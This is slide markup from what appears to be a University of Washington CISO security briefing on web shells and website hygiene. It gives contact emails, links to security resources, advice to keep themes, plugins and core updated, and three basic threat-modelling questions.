                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.drupal.org/security</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>More eBooks and videos: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId11">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>UW Libraries O’Reilly Academic</a:t>
            </a:r>
            <a:endParaRPr sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>ciso@uw.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> with the following subject lines:</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-330200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Advocates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>” to become a security advocate</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-330200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Briefings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>” to be notified of upcoming briefings</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>CISO News &amp; Alerts: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>https://ciso.uw.edu/ciso-news-and-alerts/</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open San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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426725" y="734400"/>
            <a:ext cx="8395800" cy="147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Questions?</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Google Shape;288;p48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="557300" y="2477100"/>
            <a:ext cx="3080700" cy="98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b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>ciso@uw.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Web Shells in subject line</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Google Shape;289;p48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478425" y="3568375"/>
            <a:ext cx="2798400" cy="98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t>Melissa Albin-Wurzer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>malbin@uw.edu</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Google Shape;290;p48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2875275" y="3568375"/>
            <a:ext cx="2028300" cy="98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t>Jim Poland</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>jwpoland@uw.edu</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4967375" y="3568375"/>
            <a:ext cx="2562600" cy="98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t>Jeane Marty jeanem@uw.edu</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Google Shape;286;p48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6855375" y="3568375"/>
            <a:ext cx="2562600" cy="98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t>Pete Graff</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>pgraff@uw.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600"/>
            </a:br>
            <a:endParaRPr sz="16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Become a security advocate</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Google Shape;71;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387900" y="1220350"/>
            <a:ext cx="8520600" cy="837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500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>A Community of Practice for people with an interest in learning about and promoting a culture of cybersecurity throughout the UW</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Google Shape;72;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1919750"/>
            <a:ext cx="8520600" cy="29496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4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Work with the Office of the CISO to develop and promote best practices and awareness</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Build relationships, exchange information, collaborate, share expertise, and help us all reduce risk</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans ExtraBold"/>
                <a:ea typeface="Open Sans ExtraBold"/>
                <a:cs typeface="Open Sans ExtraBold"/>
                <a:sym typeface="Open Sans ExtraBold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans ExtraBold"/>
                <a:ea typeface="Open Sans ExtraBold"/>
                <a:cs typeface="Open Sans ExtraBold"/>
                <a:sym typeface="Open Sans ExtraBold"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>ciso@uw.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans ExtraBold"/>
                <a:ea typeface="Open Sans ExtraBold"/>
                <a:cs typeface="Open Sans ExtraBold"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>with "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans ExtraBold"/>
                <a:ea typeface="Open Sans ExtraBold"/>
                <a:cs typeface="Open Sans ExtraBold"/>
                <a:sym typeface="Open Sans ExtraBold"/>
              </a:rPr>
              <a:t>Advocates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>" in the subject line.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="E9F387"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>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
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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2">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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2">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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Alerts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Google Shape;78;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The trouble with alerts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We’ll send out alerts as we see them through our channels (but we will likely not see them all) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Keep themes, plugins and core updated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Threat Modeling in 3 Easy Steps</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Google Shape;84;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>What are you trying to do?</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>What could go wrong?</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>What are you going to do about it?</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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426700" y="2054200"/>
            <a:ext cx="8395800" cy="73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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans"/>
                <a:ea typeface="Encode Sans"/>
                <a:cs typeface="Encode Sans"/>
                <a:sym typeface="Encode Sans"/>
              </a:rPr>
              <a:t>What are you trying to do?</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Encode Sans"/>
              <a:ea typeface="Encode Sans"/>
              <a:cs typeface="Encode Sans"/>
              <a:sym typeface="Encode Sans"/>
